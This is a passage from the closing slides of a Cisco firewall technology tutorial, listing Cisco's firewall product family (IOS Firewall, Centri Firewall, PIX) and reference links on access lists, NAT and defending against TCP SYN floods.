8/13/2019 Cisco - Internet Firewall Technology Tutorial
87/90
88
0999_03F8_c2
NW98 US 407
Common security management for
enterprise infrastructure
Centralized visual policy development,management, and enforcement
Adaptive configuration of networkinfrastructure
Integrate existing and future authenticationtechnologies and Cisco firewall technologies
Support for scalable configuration ofIPSEC and IKE technologies
Physical network representation
Ciscos Firewall Family
8/13/2019 Cisco - Internet Firewall Technology Tutorial
88/90
89
0999_03F8_c2
NW98 US 407
Cisco IOS Firewall feature setAdvanced, rich security option for Cisco IOSsoftware, with full routing and WAN access capabilities,that integrates seamlessly with existing Cisco IOSsoftware-based environments
Centri Firewall
High-performance, flexible, Windows NT-based securitysoftware with intuitive user-based policy rules. Easy toinstall, configure, and manage
PIX
FirewallHighest-performance, scalable, dedicatedsecurity appliance with most advanced featuresand application support, fault tolerance
References
www cisco com/univercd/cc/td/doc/product/
8/13/2019 Cisco - Internet Firewall Technology Tutorial
89/90
90
0999_03F8_c2
NW98 US 407
www.cisco.com/univercd/cc/td/doc/product/
software/ios112/112cg_cr/2cbook/2cacclst.htmDescribes access lists and lock and key
www.cisco.com/warp/public/701/31.html
Increasing security on IP networks
www.cisco.com/warp/public/707/4.htmlStrategies to protect against TCP SYN DoS attacks
www.cisco.com/univercd/cc/td/doc/product/software/ios113ed/113t/113t_3/firewall.htm
Cisco IOS Firewall feature set docs
www.cisco.com/warp/public/458/41.html
NAT FAQ
8/13/2019 Cisco - Internet Firewall Technology Tutorial
90/90
91
0999_03F8_c2
NW98 US 407